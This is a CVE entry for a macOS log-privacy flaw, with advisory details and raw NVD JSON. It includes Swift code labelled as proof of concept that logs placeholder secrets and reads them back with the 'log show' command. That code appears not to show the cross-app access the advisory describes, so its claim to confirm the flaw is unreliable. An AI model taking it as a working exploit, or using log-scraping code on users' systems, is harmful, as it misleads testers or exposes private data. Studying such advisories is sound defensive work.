Security Vulnerability Report
CVE-2025-43477 CVSS 5.5 MEDIUM

CVE-2025-43477

Published: 2025-11-04 02:15:52
Last Modified: 2026-04-02 19:20:53

Description

A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1. An app may be able to access sensitive user data.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Sequoia < 15.7.2
macOS Sonoma < 14.8.2
macOS Tahoe < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
swift
// CVE-2025-43477 PoC - macOS Log Privacy Information Disclosure
// This PoC demonstrates the vulnerability in macOS log privacy redaction
import Foundation
import os.log

class LogPrivacyTest {
    func triggerSensitiveDataLeak() {
        let logger = Logger(subsystem: "com.test.app", category: "privacy_test")

        // Sensitive data that should be redacted
        let sensitiveUserData = [
            "user_email": "[email protected]",
            "user_token": "sk-1234567890abcdef",
            "user_ssn": "123-45-6789",
            "api_key": "AKIAIOSFODNN7EXAMPLE"
        ]

        // Vulnerable logging - data not properly redacted
        logger.info("User data: \(sensitiveUserData)")

        // Read logs using log command
        let task = Process()
        task.executableURL = URL(fileURLWithPath: "/usr/bin/log")
        task.arguments = ["show", "--predicate", "subsystem == 'com.test.app'", "--last", "1"]
        let pipe = Pipe()
        task.standardOutput = pipe
        do {
            try task.run()
        } catch {
            print("Failed to run /usr/bin/log: \(error)")
            return
        }

        // Drain the pipe before waiting so a large log output cannot block the child
        let data = pipe.fileHandleForReading.readDataToEndOfFile()
        task.waitUntilExit()
        let output = String(data: data, encoding: .utf8) ?? ""

        // If sensitive data appears in output, vulnerability exists
        print("Log output: \(output)")
        print("Vulnerability confirmed if sensitive data is visible")
    }
}

// Usage
let test = LogPrivacyTest()
test.triggerSensitiveDataLeak()

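References

https://support.apple.com/en-us/125634
https://support.apple.com/en-us/125635
https://support.apple.com/en-us/125636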

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43477", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:52.110", "lastModified": "2026-04-02T19:20:52.690", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1. An app may be able to access sensitive user data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.2", "matchCriteriaId": "9827CBDC-8C03-46BA-B534-8533F0975804"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.2", "matchCriteriaId": "4BE8199E-63D1-496C-B107-52853CFC2311"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125636", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}